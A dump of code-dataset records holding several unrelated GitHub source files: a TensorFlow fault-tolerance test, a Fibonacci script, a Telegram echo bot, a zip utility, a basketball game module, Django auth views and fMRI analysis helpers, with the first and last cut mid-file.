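assert dayOfTheProgrammer(1918) == "26.09.1918"  # transition year: February had 15 days
assert dayOfTheProgrammer(1800) == "12.09.1800"  # Julian leap year (divisible by 4)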
Add test to use multi-process for eager mode after\n # b/132095481 is resolved.\n mode=['graph'],\n strategy_cls=[collective_strategy.CollectiveAllReduceStrategy],\n required_gpus=[0, 1],\n file_format=['h5', 'tf'],\n preemption_callback=[\n PreemptionAtEpochBoundarySimulatingCallback,\n PreemptionAtBatchBoundarySimulatingCallback\n ],\n # FT should work regardless of `ModelCheckpoint`'s parameters.\n save_weights_only=[True, False],\n load_weights_on_restart=[True, False],\n ))\n def testFaultToleranceInSyncStrategy(self, strategy_cls, file_format,\n preemption_callback, save_weights_only,\n load_weights_on_restart):\n \"\"\"Test fault-tolerance with multi-threading using sync dist-strat.\n\n This test simulates multi-worker training that is interrupted by a\n preemption, by having two threads, each of which represents a chief and a\n non-chief worker, where the non-chief raises an error in the middle of\n training loop. Upon excepting the error, a new thread with a new cluster\n spec is created to simulate the recovered non-chief worker. Meanwhile, the\n chief worker cannot proceed and hangs since the non-chief worker has\n crashed. To simulate a restart of the chief, a new thread has been prepared\n to run to take over chief with the help of a condition variable. It is\n expected that after the restart of both chief and non-chief workers, the\n training continues from the epoch they previously failed at. The test\n concludes by verifying the preemption-interrupted training can finish with\n the same loss and accuracy had the preemption not occurred.\n\n TODO(rchao): Add test to check preemption on chief (possibly using multi\n processes).\n\n TODO(rchao): Add test to check fault-tolerance with multiple `model.fit()`.\n\n Arguments:\n strategy_cls: The strategy class to use.\n file_format: `h5` or `tf`.\n preemption_callback: The callback to simulate preemption.\n save_weights_only: The argument for `model.fit()`'s `save_weights_only`.\n load_weights_on_restart: The argument for `model.fit()`'s\n `load_weights_on_restart`.\n \"\"\"\n\n def _independent_worker_fn(*args, **kwargs): # pylint: disable=unused-argument\n with test.mock.patch.object(dc, '_run_std_server',\n self._make_mock_run_std_server()):\n # `before_restart` is True for the threads that represent the original\n # chief and non-chief worker, and False for threads that represent the\n # restarted chief and non-chief workers.\n before_restart = kwargs['before_restart']\n\n # Model building under strategy scope. Following is the code we expect\n # the user runs on every worker.\n strategy = get_strategy_object(strategy_cls)\n batch_size = 64\n steps = 3\n train_ds, _ = multi_worker_testing_utils.mnist_synthetic_dataset(\n batch_size, steps)\n\n with strategy.scope():\n model = multi_worker_testing_utils.get_mnist_model((28, 28, 1))\n\n # Function to start a new thread. 
This will be called twice in the\n # following code: one represents the restart of the non-chief, and one\n # represents the restart of the chief as a result of the restart of the\n # non-chief (so the training can continue in sync).\n def start_new_thread(new_chief):\n new_thread_tf_config = json.loads(os.environ['TF_CONFIG'])\n\n # Update the ports in new chief and new worker threads.\n new_thread_tf_config['cluster']['worker'] = kwargs['reserved_ports']\n\n # Since both new chief and new worker threads are started from the\n # worker thread, we need to overwrite the tf config task index.\n new_thread_tf_config['task']['index'] = 0 if new_chief else 1\n return self._run_task_in_thread(\n task_fn=_independent_worker_fn,\n cluster_spec=None,\n task_type=None,\n task_id=None,\n tf_config=new_thread_tf_config,\n before_restart=False,\n new_chief=new_chief)\n\n try:\n\n class CkptSavedEpochAssertingCallback(callbacks.Callback):\n\n def __init__(self, test_obj):\n super(CkptSavedEpochAssertingCallback, self).__init__()\n self.test_obj = test_obj\n\n def on_epoch_begin(self, epoch, logs=None):\n # `_ckpt_saved_epoch` attribute is set at the end of every epoch.\n self.test_obj.assertEqual(\n K.eval(self.model._ckpt_saved_epoch) ==\n training_state.CKPT_SAVED_EPOCH_UNUSED_VALUE, epoch == 0)\n\n callbacks_list = [\n callbacks.ModelCheckpoint(\n filepath=saving_filepath,\n save_weights_only=save_weights_only,\n load_weights_on_restart=load_weights_on_restart),\n CkptSavedEpochAssertingCallback(self)\n ]\n if before_restart:\n callbacks_list.append(preemption_callback())\n\n self.assertFalse(hasattr(model, training_state.CKPT_SAVED_EPOCH))\n history = model.fit(\n x=train_ds,\n epochs=num_epoch,\n steps_per_epoch=steps,\n callbacks=callbacks_list)\n self.assertFalse(hasattr(model, training_state.CKPT_SAVED_EPOCH))\n\n # `history` of the training result is collected to be compared against\n # each other. It is expected that the training results (loss and\n # accuracy`) are the same with or without preemption.\n self._histories.append(history.history)\n\n except RuntimeError:\n # pylint: disable=g-assert-in-except\n self.assertTrue(before_restart)\n # Reset the barrier so the new threads simulating recovery can\n # continue.\n self._barrier._counter = 0\n self._barrier._flag = False\n\n # At this point we block the original non-chief thread, and\n # start the new threads that simulate the restarted chief and\n # non-chief, joining the threads and return.\n new_chief_thread = start_new_thread(new_chief=True)\n new_worker_thread = start_new_thread(new_chief=False)\n self.join_independent_workers([new_chief_thread, new_worker_thread])\n return\n\n # Successful end of a `fit()` call.\n with self._lock:\n self._successful_thread_ends += 1\n self.assertFalse(before_restart)\n\n # Common parameters\n num_workers = 2\n num_epoch = 3\n # History list storing the results for preemption and no preemption cases.\n self._histories = []\n # Lock required to prevent race condition between two threads.\n self._lock = threading.Lock()\n strategy = get_strategy_object(strategy_cls)\n\n def handler(signum, frame):\n del signum, frame\n # `session.run()` within `model.fit()` can time out. 
Skipping it as it\n # doesn't represent the failure of this test.\n self.skipTest('Skipping test due to `session.run()` timeout.')\n\n signal.signal(signal.SIGALRM, handler)\n # Alarming within 5 min before the test timeouts and fails.\n signal.alarm(240)\n\n def get_saving_dir_and_filepath():\n saving_dir = tempfile.mkdtemp(prefix=self.get_temp_dir())\n saving_filepath = os.path.join(saving_dir, 'checkpoint.' + file_format)\n return saving_dir, saving_filepath\n\n # Case 1: Training for `num_epoch` without preemptions.\n cluster_spec = test_base.create_cluster_spec(num_workers=num_workers)\n self._barrier = dc._Barrier(2)\n self._successful_thread_ends = 0\n # Get a new temporary filepath to save the checkpoint to.\n saving_dir, saving_filepath = get_saving_dir_and_filepath()\n threads = self.run_multiple_tasks_in_threads(\n _independent_worker_fn,\n cluster_spec,\n # Pass `saving_filepath` from the parent thread to ensure every worker\n # has the same filepath to save.\n saving_filepath=saving_filepath,\n before_restart=False,\n new_chief=False)\n threads_to_join = []\n if strategy.extended.experimental_between_graph:\n for ts in threads.values():\n threads_to_join.extend(ts)\n else:\n threads_to_join = [threads['worker'][0]]\n self.join_independent_workers(threads_to_join)\n\n # `self.test_skipped_reason` could be set when a non-main thread attempts\n # to skip the test.\n # `multi_worker_test_base.skip_if_grpc_server_cant_be_started()` is an\n # example of where this can be set. Since raising `SkipTest` in a non-main\n # thread doesn't actually skip the test, we check if the test should be\n # skipped here once we have joined the threads.\n if getattr(self, 'test_skipped_reason', None) is not None:\n self.skipTest(self.test_skipped_reason)\n\n self.assertTrue(\n training_state.remove_checkpoint_if_exists(saving_dir, saving_filepath))\n self.assertEqual(self._successful_thread_ends, 2)\n\n # Case 2: Training for `num_epoch` epoch with preemptions.\n # The preemption is simulated at both epoch boundary and batch boundary.\n cluster_spec = test_base.create_cluster_spec(num_workers=num_workers)\n self._barrier = dc._Barrier(2)\n # Ports reserved for new threads simulating recovery.\n reserved_ports = [\n 'localhost:%s' % test_base.pick_unused_port()\n for _ in range(num_workers)\n ]\n self._successful_thread_ends = 0\n # Get a new temporary filepath to save the checkpoint to.\n saving_dir, saving_filepath = get_saving_dir_and_filepath()\n threads = self.run_multiple_tasks_in_threads(\n _independent_worker_fn,\n cluster_spec,\n # Pass `saving_filepath` from the parent thread to ensure every worker\n # has the same filepath to save.\n saving_filepath=saving_filepath,\n reserved_ports=reserved_ports,\n before_restart=True,\n new_chief=False)\n threads_to_join = []\n if strategy.extended.experimental_between_graph:\n # Only join the non-chief thread since the first thread for chief will\n # eventually hang and be ignored.\n threads_to_join = [threads['worker'][1]]\n else:\n threads_to_join = [threads['worker'][0]]\n self.join_independent_workers(threads_to_join)\n if getattr(self, 'test_skipped_reason', None) is not None:\n self.skipTest(self.test_skipped_reason)\n\n self.assertTrue(\n training_state.remove_checkpoint_if_exists(saving_dir, saving_filepath))\n self.assertEqual(self._successful_thread_ends, 2)\n\n def assert_all_elements_are_identical(list_to_check):\n first_item = list_to_check[0]\n for item in list_to_check[1:]:\n self.assertAllClose(first_item, item, rtol=2e-5, atol=1e-5)\n\n 
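The SIGALRM watchdog armed above is a reusable pattern on its own; a minimal standalone sketch (Unix-only; the 240-second budget mirrors the test):

import signal

def _on_timeout(signum, frame):
    raise TimeoutError("watchdog fired")

signal.signal(signal.SIGALRM, _on_timeout)
signal.alarm(240)      # fire if the guarded block takes longer than 240 s
try:
    pass               # long-running work goes here
finally:
    signal.alarm(0)    # always disarm the watchdog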
# Important: the results from preemption interrupted and non-interrupted\n    # cases should give the same final results.\n    assert_all_elements_are_identical(\n        [history['acc'][-1] for history in self._histories])\n    assert_all_elements_are_identical(\n        [history['loss'][-1] for history in self._histories])\n    # The length of `self._histories` would be num_workers * num_runs (2 * 2 = 4).\n    self.assertLen(self._histories, 4)\n\n    # Results from case 1 should have 3 full epochs.\n    self.assertLen(self._histories[0]['acc'], 3)\n    # Results from case 2 should only have 2 full epochs because it restarted at\n    # epoch 1.\n    self.assertLen(self._histories[-1]['acc'], 2)\n\n\nif __name__ == '__main__':\n  with test.mock.patch.object(sys, 'exit', os._exit):\n    test.main()\n","repo_name":"DeepRec-AI/DeepRec","sub_path":"tensorflow/python/keras/distribute/multi_worker_fault_tolerance_test.py","file_name":"multi_worker_fault_tolerance_test.py","file_ext":"py","file_size_in_byte":14251,"program_lang":"python","lang":"en","doc_type":"code","stars":895,"dataset":"github-code","pt":"31"} {"seq_id":"29677048987","text":"S = int(input('How many numbers of the sequence? '))\nF = 0\nK = 1\nL = 3\nprint('The Fibonacci sequence goes:')\nprint('{} - {} -'.format(F, K), end='')\nwhile L <= S:\n    G = F + K\n    print(' {} '.format(G), end='')\n    F = K\n    K = G\n    L += 1\n    print('-' if L <= S else '- Limit reached', end='')\n","repo_name":"SPSsilva/Python","sub_path":"Mundo 2/Ex. 63.py","file_name":"Ex. 63.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} {"seq_id":"7680270786","text":"from telegram.ext import CommandHandler, MessageHandler, Filters\nfrom telegram_bot_plug import Bot\n\n\nclass AnotherCustomBot(Bot):\n    def __init__(self, dp):\n        super().__init__(dp)  # This must always be called first!\n\n        self.wants_echo = False  # Tracks whether the user has sent us the /echo command\n\n        handlers = [\n            CommandHandler(\"echo\", self.handle_echo_command),\n            MessageHandler(Filters.text & ~Filters.command, self.handle_messages),\n        ]\n        self.add_handlers(handlers)\n\n    def handle_echo_command(self, update, context):\n        # The user has sent us /echo, meaning they want their text echoed from now on\n        self.wants_echo = True\n        update.message.reply_text(\"From now on I am going to be annoying\")\n\n    def handle_messages(self, update, context):\n        if self.wants_echo:\n            update.message.reply_text(\"I like to repeat you: \" + update.message.text)\n","repo_name":"x821938/TelegramBotPlug","sub_path":"my_bots/custom_echo_bot.py","file_name":"custom_echo_bot.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
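A hypothetical runner for the echo bot above (assumes a python-telegram-bot v13-style Updater, which the CommandHandler/Filters imports suggest; the token is a placeholder):

from telegram.ext import Updater
from custom_echo_bot import AnotherCustomBot

updater = Updater("YOUR_BOT_TOKEN")          # placeholder token
bot = AnotherCustomBot(updater.dispatcher)   # registers its handlers on construction
updater.start_polling()
updater.idle()

{"seq_id":"20756371541","text":"import zipfile\nimport os\n\ndef clear_console():\n    if os.name == 'nt': #FOR WINDOWS\n        os.system('cls')\n    else: #FOR UNIX/LINUX/MACOS\n        os.system('clear')\n\nclear_console()\n\ndef count_files(directory):\n    \"\"\"\n    COUNTS THE NUMBER OF FILES IN A DIRECTORY RECURSIVELY\n    \"\"\"\n    file_count = 0\n    for root, dirs, files in os.walk(directory):\n        file_count += len(files)\n    return file_count\n\ndef create_archive(archive_name, directories):\n    \"\"\"\n    CREATES A ZIP ARCHIVE FROM A DIRECTORY\n    \"\"\"\n    with zipfile.ZipFile(archive_name, 'w', zipfile.ZIP_DEFLATED) as zipf:\n        total_files = sum(count_files(directory) for directory in directories) # COUNT ALL FILES IN ALL DIRECTORIES\n        processed_files = 0\n\n        try:\n            for directory in directories:\n                for 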
root, dirs, files in os.walk(directory):\n for file in files:\n if file == '.DS_Store':\n continue\n full_path = os.path.join(root, file)\n relative_path = os.path.relpath(full_path, directory)\n zipf.write(full_path, arcname=relative_path)\n processed_files += 1\n\n #PROGRESS BAR\n percent_complete = (processed_files / total_files) * 100\n print(\"PROGRESS: [{:<50}] {:.2f}%\".format('='*int(percent_complete/2), percent_complete), end='\\r', flush=True)\n\n #ENSURES THE PROGRESS BAR IS 25% OF THE TOTAL LENGTH AT THE END\n print(\"\\rADDING FILE {}/{} TO ARCHIVE (COMPLETED) [{}] 100.00%\".format(total_files, total_files, '='*int(50*0.25)), ' ' * 20, flush=True)\n except Exception as e:\n print(\"\\rERROR DURING ARCHIVING: {}\".format(e))\n print(\"ADDING FILE {}/{} TO ARCHIVE (INCOMPLETE) [{}] {:.2f}%\".format(processed_files, total_files, '='*int((processed_files/total_files)*50), (processed_files/total_files)*100), flush=True)\n\n print() #PRINTS A NEWLINE AT THE END\n\ndef extract_archive(archive_name, target_directory):\n \"\"\"\n EXTRACTS A ZIP ARCHIVE TO A DIRECTORY\n \"\"\"\n try:\n with zipfile.ZipFile(archive_name, 'r') as zipf:\n total_files = len(zipf.namelist())\n processed_files = 0\n\n #CREATE A DIRECTORY FOR EXTRACTION WITH THE SAME NAME AS THE ARCHIVE\n base_extraction_directory = os.path.join(target_directory, os.path.splitext(archive_name)[0])\n extraction_directory = base_extraction_directory\n i = 1\n while os.path.exists(extraction_directory):\n extraction_directory = \"{}_{}\".format(base_extraction_directory, i)\n i += 1\n os.makedirs(extraction_directory, exist_ok=True)\n\n for file in zipf.namelist():\n try:\n #ADJUSTS THE TARGET DIRECTORY FOR EXTRACTION\n zipf.extract(file, extraction_directory)\n processed_files += 1\n percent_complete = (processed_files / total_files) * 100\n print(\"PROGRESS: [{:<50}] {:.2f}%\".format('='*int(percent_complete/2), percent_complete), end='\\r', flush=True)\n except Exception as e:\n print(\"\\rERROR DURING EXTRACTION: {}\".format(e))\n print(\"EXTRACTING FILE {}/{} (INCOMPLETE) [{}] {:.2f}%\".format(processed_files, total_files, '='*int((processed_files/total_files)*50), (processed_files/total_files)*100), flush=True)\n\n print(\"\\rEXTRACTING FILE {}/{} (COMPLETED) [{}] 100.00%\".format(total_files, total_files, '='*int(50*0.25)), ' ' * 20, flush=True)\n print(\"\\nEXTRACTION COMPLETED SUCCESSFULLY!\")\n except Exception as e:\n print(f\"\\nERROR WHILE OPENING ARCHIVE: {e}\")\n\nif __name__ == \"__main__\":\n # LISTS ALL DIRECTORIES IN THE CURRENT DIRECTORY\n directories = [name for name in os.listdir('.') if os.path.isdir(name)]\n\n # IF THERE ARE NO DIRECTORIES, DISPLAYS AN ERROR MESSAGE AND EXITS\n if not directories:\n print(\"ERROR : NO DIRECTORIES FOUND.\")\n exit(1)\n\n # DISPLAYS THE DIRECTORIES AND ASKS THE USER TO CHOOSE ONE OR MORE\n while True:\n print(\"PLEASE CHOOSE ONE OR MORE DIRECTORIES TO ZIP (SEPARATED BY SPACES):\")\n for i, directory in enumerate(directories, start=1):\n print(f\"{i}. 
{directory}\")\n\n choices = input(\"ENTER THE NUMBERS OF THE DIRECTORIES (TAP 'EXIT' TO QUIT): \").lower().split()\n if '0' in choices or 'exit' in choices:\n print(\"OK, SCRIPT IS ENDING.\")\n exit(0)\n\n try:\n choices = [int(i)-1 for i in choices] #ADJUSTS THE INDICES\n except ValueError:\n clear_console()\n print(\"INVALID INPUT, PLEASE ENTER NUMBERS OR 'EXIT' TO QUIT.\\n\")\n continue\n\n if all(0 <= i < len(directories) for i in choices):\n chosen_directories = [directories[i] for i in choices]\n break\n else:\n clear_console()\n print(f\"THERE ARE ONLY {len(directories)} SELECTABLE DIRECTORIES, PLEASE CHOOSE AGAIN.\\n\")\n\n archive_name = '_'.join(chosen_directories) + '.zip'\n\n # IF THE ARCHAIVE ALREADY EXISTS, ASKS THE USER IF THEY WANT TO EXTRACT IT\n if os.path.exists(archive_name):\n response = input(f\"THE ARCHIVE '{archive_name}' ALREADY EXISTS. DO YOU WANT TO EXTRACT ALL ITEM HERE ? (YES/NO): \").lower()\n if response == 'y' or response == 'yes':\n extract_archive(archive_name, os.getcwd())\n else:\n print(\"OK, SCRIPT IS ENDING.\")\n exit(0)\n else:\n # MOVED OUT OF THE FOR LOOP\n create_archive(archive_name, chosen_directories)","repo_name":"BabylooPro/zipper.py","sub_path":"zipper.py","file_name":"zipper.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22829228969","text":"from utils import print_stuff\nimport random\nimport copy\nfrom utils import clear\nfrom utils import colour_it\nfrom utils import Color\nfrom utils import choose\n\nfamous = False\n\nclass Player:\n\n\tdef __init__(self, name=\"\", offense=0, defence=0, speed=0, position=\"\", exhaustion=0):\n\t\tself.name = name\n\t\tself.offense = offense\n\t\tself.defence = defence\n\t\tself.speed = speed\n\t\tself.position = position\n\t\tself.exhaustion = exhaustion\n\n\n\tdef pass_ball(self, defender, team, ball_player, ball_distance):\n\t\tpass\n\n\n\tdef skirt(self, defender, team, ball_player, ball_distance):\n\t\tpass\n\n\tdef shoot(self, defender, team, ball_player, ball_distance):\n\t\tshot = random.randrange(1, 50 + (45 - ball_distance))\n\t\tscore = 0\n\t\tif ball_distance >= 40:\n\t\t\tprint_stuff(f\"\"\"{colour_it(self.name, Color.ALLY)} slams the ball through the hoop in a dunk!\"\"\")\n\t\t\treturn 2\n\t\telif ball_distance <= 23:\n\t\t\tprint_stuff(f\"\"\"{colour_it(self.name, Color.ALLY)} takes a shot for a 3 pointer!\"\"\")\n\t\t\tscore = 3\n\t\telif ball_distance <= 28:\n\t\t\tprint_stuff(f\"\"\"{colour_it(self.name, Color.ALLY)} takes a shot for a 2 pointer!\"\"\")\n\t\t\tscore = 2\n\t\telse:\n\t\t\tprint_stuff(f\"\"\"{colour_it(self.name, Color.ALLY)} takes a shot!\"\"\")\n\t\tif shot <= self.offense:\n\t\t\tprint_stuff(f\"\"\"Swish! Through the hoop!\"\"\")\n\t\t\treturn score\n\t\telse:\n\t\t\tprint_stuff(\"A miss! 
Unlucky.\")\n\t\t\treturn 0\n\n\nfirstnames = [\"John\", \"Carl\", \"David\", \"Andrew\", \"Toby\", \"Nathan\", \"Rodrigo\", \"Shaun\", \"Michael\", \"Felix\", \"Matt\", \"Ethan\"]\nlastnames = [\"Smith\", \"Cage\", \"James\", \"Hill\", \"Brown\", \"Mitchel\", \"Cole\", \"Johnson\", \"Wayne\", \"Miller\", \"Gabriel\", \"Davies\", \"McDuff\"]\nfamous_names = [\"Jesus Christ\", \"Jeff Bezos\", \"Mohammed Ali\", \"Derrin Brown\", \"Obama bin Laden\", \"Kanye West\", \"Mr Beast\", \"Snoop Dogg\", \"Neil Armstrong\", \"Spiderman\", \"Saddam Hussein\", \"Boe Jiden\", \"Bill Gates\", \"Bruce Lee\", \"Mahatma Gandhi\", \"Sugar Daddy Craig\", \"Renegade Raider\", \"Steve Jobs\", \"Mike Kachowski\"]\noffenses1 = [45, 55, 60, 70, 80]\ndefences1 = [45, 55, 60, 70, 80]\nspeeds1 = [11, 13, 16, 21, 25]\noffenses2 = copy.deepcopy(offenses1)\ndefences2 = copy.deepcopy(defences1)\nspeeds2 = copy.deepcopy(speeds1)\n\nplayer_no = 0\n\nplayers = [\"player1\", \"player2\", \"player3\", \"player4\", \"player5\"]\ngoodies = {}\nbaddies = {}\n\n\ndef generate_players():\n\tremoved_players = list(players[player_no:])\n\tfor player in removed_players:\n\t\tplayers.remove(player)\n\tfor player in players:\n\t\tif not famous:\n\t\t\tgoody_name = choose(firstnames) + \" \" + choose(lastnames)\n\t\t\tbaddy_name = choose(firstnames) + \" \" + choose(lastnames)\n\t\telse:\n\t\t\tgoody_name = choose(famous_names)\n\t\t\tbaddy_name = choose(famous_names)\n\t\tgoodies[player] = Player(goody_name, choose(offenses1), choose(defences1), choose(speeds1))\n\t\tbaddies[player] = Player(baddy_name, choose(offenses2), choose(defences2), choose(speeds2))\n\n\ndef print_players():\n\tcounter = 1\n\tclear()\n\tprint(\"Your players are:\")\n\tfor player in goodies.keys():\n\t\tprint(f\"\"\"{counter}. 
{colour_it(goodies[player].name, Color.ALLY)}\"\"\")\n\t\tcounter += 1\n\n\ndef view_players():\n\twhile True:\n\t\tplayer_numbers = [\"1\", \"2\", \"3\", \"4\", \"5\"]\n\t\tprint_players()\n\t\tchoice = input(\"\"\"\nEnter a player's number to view their statistics, or enter any key to continue.\n>>> \"\"\")\n\t\tif choice not in player_numbers:\n\t\t\tbreak\n\t\telse:\n\t\t\tclear()\n\t\t\tprint_stuff(f\"\"\"{colour_it(goodies['player' + choice].name, Color.ALLY)}\nOffense: {goodies['player' + choice].offense}\nDefence: {goodies['player' + choice].defence}\nSpeed: {goodies['player' + choice].speed}\n\"\"\")\n","repo_name":"jessebro/basketball","sub_path":"players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":3451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10023828376","text":"from django.shortcuts import render, redirect\nfrom django.contrib import auth\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import AuthenticationForm\n\nfrom forms import SignupForm\n\n\ndef signup(request):\n    \"\"\"\n    This function\n    - returns view for signup page\n    - handles http request for signup\n    - creates new user\n    :param request: HttpRequest\n    :return: HttpResponseObject\n    \"\"\"\n    user = request.user\n    if user.is_authenticated():\n        return redirect('booking:home')\n    if request.method == 'POST':\n        signup_form = SignupForm(data=request.POST, prefix='signup', auto_id='id_signup_%s')\n        message = ''\n        if signup_form.is_valid():\n            if signup_form.save():\n                message = 'Your account has been created, you may login with your entered credentials'\n            else:\n                message = 'Your account has not been created, some error occurred'\n\n        context = {\n            'signup_form': signup_form,\n            'message': message\n        }\n        return render(request, 'signup.html', context)\n    else:\n        signup_form = SignupForm(prefix='signup', auto_id='id_signup_%s')\n        context = {\n            'signup_form': signup_form\n        }\n        return render(request, 'signup.html', context)\n\n\ndef login(request):\n    \"\"\"\n    This function\n    - returns view for login page\n    - handles http request for login\n    - logs in user with correct credentials\n    :param request: HttpRequest\n    :return: HttpResponseObject\n    \"\"\"\n    user = request.user\n    if user.is_authenticated():\n        return redirect('booking:home')\n    if request.method == 'POST':\n        login_form = AuthenticationForm(data=request.POST, prefix='login', auto_id='id_login_%s')\n\n        if login_form.is_valid():\n            # Django treats unique identifiers as username, so here email is referred to as username\n            email = login_form.cleaned_data['username']\n            password = login_form.cleaned_data['password']\n\n            user = auth.authenticate(email=email, password=password)\n\n            if user is not None:\n                auth.login(request, user)\n                return redirect('booking:home')\n\n        context = {\n            'login_form': login_form\n        }\n\n        return render(request, 'login.html', context)\n    else:\n        login_form = AuthenticationForm(prefix='login', auto_id='id_login_%s')\n        context = {\n            'login_form': login_form\n        }\n        return render(request, 'login.html', context)\n\n\n@login_required\ndef logout(request):\n    \"\"\"\n    This function\n    - logs out a logged in user\n    - redirects to login/signup page\n    :param request: HttpRequest\n    :return: HttpResponseObject\n    \"\"\"\n    auth.logout(request)\n    return redirect('booking:login')\n\n\n@login_required\ndef home(request):\n    \"\"\"\n    This function\n    - generates the landing page for a logged-in CRBS user\n    :param request: HttpRequest\n    :return: HttpResponseObject\n    
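Example (illustrative only, assuming this view is routed at '/'):\n        >>> from django.test import Client\n        >>> Client().get('/')  # 302 redirect to login when unauthenticated\n    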
\"\"\"\n context = {}\n return render(request, 'home.html', context)\n","repo_name":"jainendra/ConferenceRoomBookingSystem","sub_path":"booking/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33800918600","text":"import pickle\nfrom matplotlib.pyplot import fill\nimport numpy as np\nimport pandas as pd\nfrom torch import neg\nfrom util.model_config import COCO_cat, COCO_super_cat\n\nimport configparser\n\nconfig = configparser.ConfigParser()\nconfig.read(\"config.cfg\")\nstim_path = config[\"DATA\"][\"StimuliInfo\"]\nSTIM = pd.read_pickle(stim_path)\n\n\ndef fill_in_nan_voxels(vals, subj, output_root, fill_in=0):\n try: # some subject has zeros voxels masked out\n nonzero_mask = np.load(\n \"%s/output/voxels_masks/subj%d/nonzero_voxels_subj%02d.npy\"\n % (output_root, subj, subj)\n )\n if type(vals) is list:\n tmp = np.zeros(nonzero_mask.shape) + fill_in\n tmp[nonzero_mask] = vals\n return tmp\n elif len(vals.shape) == 1:\n tmp = np.zeros(nonzero_mask.shape) + fill_in\n tmp[nonzero_mask] = vals\n return tmp\n elif len(vals.shape) == 2:\n tmp = np.zeros((vals.shape[0], len(nonzero_mask))) + fill_in\n tmp[:, nonzero_mask] = vals\n return tmp\n except FileNotFoundError:\n return vals\n\n\ndef load_model_performance(model, output_root=\".\", subj=1, measure=\"corr\"):\n if measure == \"pvalue\":\n measure = \"corr\"\n pvalue = True\n else:\n pvalue = False\n\n if type(model) == list:\n # to accomodate different naming of the same model\n for m in model:\n try:\n out = np.load(\n \"%s/output/encoding_results/subj%d/%s_%s_whole_brain.p\"\n % (output_root, subj, measure, m),\n allow_pickle=True,\n )\n except FileNotFoundError:\n continue\n else:\n out = np.load(\n \"%s/output/encoding_results/subj%d/%s_%s_whole_brain.p\"\n % (output_root, subj, measure, model),\n allow_pickle=True,\n )\n\n if measure == \"corr\":\n if pvalue:\n out = np.array(out)[:, 1]\n out = fill_in_nan_voxels(out, subj, output_root, fill_in=1)\n return out\n else:\n out = np.array(out)[:, 0]\n\n out = fill_in_nan_voxels(out, subj, output_root)\n\n return np.array(out)\n\n\ndef load_top1_objects_in_COCO(cid):\n cat = np.load(\"features/cat.npy\")\n\n # extract the nsd ID corresponding to the coco ID in the stimulus list\n stim_ind = STIM[\"nsdId\"][STIM[\"cocoId\"] == cid]\n # extract the respective features for that nsd ID\n catID_of_trial = cat[stim_ind, :]\n catnm = COCO_cat[np.argmax(catID_of_trial)]\n return catnm\n\n\ndef load_objects_in_COCO(cid):\n cat = np.load(\"features/cat.npy\")\n supcat = np.load(\"features/supcat.npy\")\n\n # extract the nsd ID corresponding to the coco ID in the stimulus list\n stim_ind = STIM[\"nsdId\"][STIM[\"cocoId\"] == cid]\n # extract the repective features for that nsd ID\n catID_of_trial = cat[stim_ind, :].squeeze()\n supcatID_of_trial = supcat[stim_ind, :].squeeze()\n catnms = []\n\n assert len(catID_of_trial) == len(COCO_cat)\n assert len(supcatID_of_trial) == len(COCO_super_cat)\n\n catnms += list(COCO_cat[catID_of_trial > 0])\n catnms += list(COCO_super_cat[supcatID_of_trial > 0])\n return catnms\n\n\ndef load_subset_trials(coco_id_by_trial, cat, negcat=False):\n \"\"\"\n Returns a list of idx to apply on the 10,000 trials for each subject. 
These are not trial IDs themselves, but\n    indexes into the trial IDs.\n    \"\"\"\n    subset_idx, negsubset_idx = [], []\n    for i, id in enumerate(coco_id_by_trial):\n        catnms = load_objects_in_COCO(id)\n        if cat in catnms:\n            subset_idx.append(i)\n        else:\n            negsubset_idx.append(i)\n    if negcat:\n        return negsubset_idx\n    else:\n        return subset_idx\n\n\ndef find_trial_indexes(subj, cat=\"person\", output_dir=\"output\"):\n    coco_id = np.load(\"%s/coco_ID_of_repeats_subj%02d.npy\" % (output_dir, subj))\n\n    idx1, idx2 = [], []\n    for i, id in enumerate(coco_id):\n        catnms = load_objects_in_COCO(id)\n        if cat in catnms:\n            idx1.append(i)\n        else:\n            idx2.append(i)\n    return idx1, idx2\n\n\ndef extract_test_image_ids(subj=1, output_dir=\"output\"):\n    from sklearn.model_selection import train_test_split\n\n    _, test_idx = train_test_split(range(10000), test_size=0.15, random_state=42)\n    coco_id = np.load(\"%s/coco_ID_of_repeats_subj%02d.npy\" % (output_dir, subj))\n    test_image_id = coco_id[test_idx]\n    return test_image_id, test_idx\n\n\ndef extract_single_roi(roi_name, output_dir, subj):\n    from util.model_config import roi_name_dict\n    from extract_cortical_voxel import extract_cortical_mask\n\n    output_masks, roi_labels = list(), list()\n    try:\n        roi_mask = np.load(\n            \"%s/voxels_masks/subj%01d/roi_1d_mask_subj%02d_%s.npy\"\n            % (output_dir, subj, subj, roi_name)\n        )\n    except FileNotFoundError:\n        roi_mask = extract_cortical_mask(subj, roi=roi_name, output_dir=output_dir)\n        roi_mask = np.load(\n            \"%s/voxels_masks/subj%01d/roi_1d_mask_subj%02d_%s.npy\"\n            % (output_dir, subj, subj, roi_name)\n        )\n\n    roi_dict = roi_name_dict[roi_name]\n    for k, v in roi_dict.items():\n        if int(k) > 0:\n            if np.sum(roi_mask == int(k)) > 0:\n                output_masks.append(roi_mask == int(k))\n                roi_labels.append(v)\n    return output_masks, roi_labels\n\n\ndef compute_sample_performance(model, subj, output_dir, masking=\"sig\", measure=\"corrs\"):\n    \"\"\"\n    Returns sample-wise performances for encoding model.\n    \"\"\"\n    if measure == \"corrs\":\n        from scipy.stats import pearsonr\n\n        metric = pearsonr\n    elif measure == \"rsq\":\n        from sklearn.metrics import r2_score\n\n        metric = r2_score\n\n    try:\n        sample_corrs = np.load(\n            \"%s/output/clip/%s_sample_%s_%s.npy\" % (output_dir, model, measure, masking)\n        )\n        if len(sample_corrs.shape) == 2:\n            sample_corrs = np.array(sample_corrs)[:, 0]\n            np.save(\n                \"%s/output/clip/%s_sample_corrs_%s.npy\" % (output_dir, model, masking),\n                sample_corrs,\n            )\n    except FileNotFoundError:\n        yhat, 